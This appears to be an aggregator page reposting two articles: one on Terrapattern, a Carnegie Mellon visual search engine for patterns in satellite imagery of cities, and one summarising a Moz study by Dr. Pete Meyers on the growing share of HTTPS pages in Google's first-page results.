It’s easy to while away time on Terrapattern, even if you don’t really have a set intention. Clicking around invariably leads to some interesting, visual understandings of urbanism, even if they don’t necessarily carry great social meaning. For instance, I could easily use Google Maps to search for tennis courts in San Francisco, but Terrapattern allows me to see how many purple ones the city has. Perhaps more helpful to some is how easy the project makes it to find buildings with solar panels on their roofs. In Pittsburgh, you’ll find neighborhoods rife with round yard pools and cul-de-sacs; contrasting with these indicators of suburbia are the shipping container yards of New York City, with cars neatly lined up like colorful bits of unused chalk; or the areas in Detroit where expressways intersect, which, when compiled, form a giddy snapshot of urban transportation. I was also able to locate the sections of New York City’s overflowing cemeteries that are divided by wide roads, a collection of images that alludes to the city’s history of negotiating the relationship between its dead and its living.

Of course, users are not restricted to only tracking infrastructure. The Carnegie Mellon team has collected images of boat wakes in rivers; one of my first searches was for clusters of yellow taxi cabs. Such tiled images of ephemeral forms exemplify Terrapattern’s potential for all sorts of discovery. Terrapattern is currently in alpha mode, and its developers are working to roll out more cities soon. On deck next are London and Johannesburg.

“Mostly I want to give people this fun experience, where they spend time clicking around and think this is fascinating even if they don’t really know what it’s good for,” Levin said. “If someone spent two hours with it, that indicates this is something profound.”

Intersecting expressways in Detroit

Areas of cemeteries divided by roads in New York City

Clusters of cabs in New York City

Dilapidated plots in Detroit

Boat wakes in New York City rivers

Cul-de-sacs in Pittsburgh

Shipping container yards in New York City

Solar panels in New York City

http://hyperallergic.com/301858/a-visual-search-engine-for-the-aerial-patterns-of-cities/

Categorized in Search Engine

Two years after Google announced HTTPS would become a ranking signal, Dr. Pete Meyers of Moz has put together a study with revealing new findings about the adoption rate of HTTPS since the announcement was made.

When Google made its official announcement regarding HTTPS, some were quick to make the transition, while others believed the effort wasn’t worth the potential reward. Some have avoided transitioning to HTTPS because they believe there are possible risks associated with doing so.

Dr. Pete Meyers has put together data which suggests Google is slowly but surely accomplishing its goal of having more HTTPS sites on the web. Here is a summary of his findings.

The Findings

Before Google’s HTTPS algorithm update, Moz’s data showed that only 7% of the pages featured on the first page of Google’s search results were HTTPS. A week later, that number rose to 8%.

Two years later, that number has multiplied to over 30%:

“As of late June, our tracking data shows that 32.5% (almost one-third) of page-1 Google results now use the “https:” protocol.”

The fact that the increase has been a gradual progression leads Dr. Meyers to believe it was not purely the result of algorithm updates alone. Rather, the increase in HTTPS sites on the first page of Google’s search results is an indication that Google’s PR campaign is working.

Dr. Meyers predicts that in another 1–1.5 years, 50% of first-page search results will be HTTPS sites. When this time comes, Dr. Meyers also predicts that Google will strengthen the ranking signal.

The Risks

Google has been downplaying the risks of migrating to HTTPS, Dr. Meyers argues, as there is risk associated with any kind of sitewide change to URLs.

Before migrating to HTTPS, it’s recommended that you weigh the time, money, and possible risk against receiving a minor algorithmic boost. With that being said, it’s still difficult to convince website owners that converting to HTTPS is worth it.

Dr. Meyers’ final recommendation is, if you’re still not sold on HTTPS, then at least be aware of how many sites in your industry are making the switch. Stay alert for another HTTPS algorithm update which could be coming within a year’s time.

https://www.searchenginejournal.com/30-search-results-now-https-according-moz-study/167515/

Categorized in Search Engine
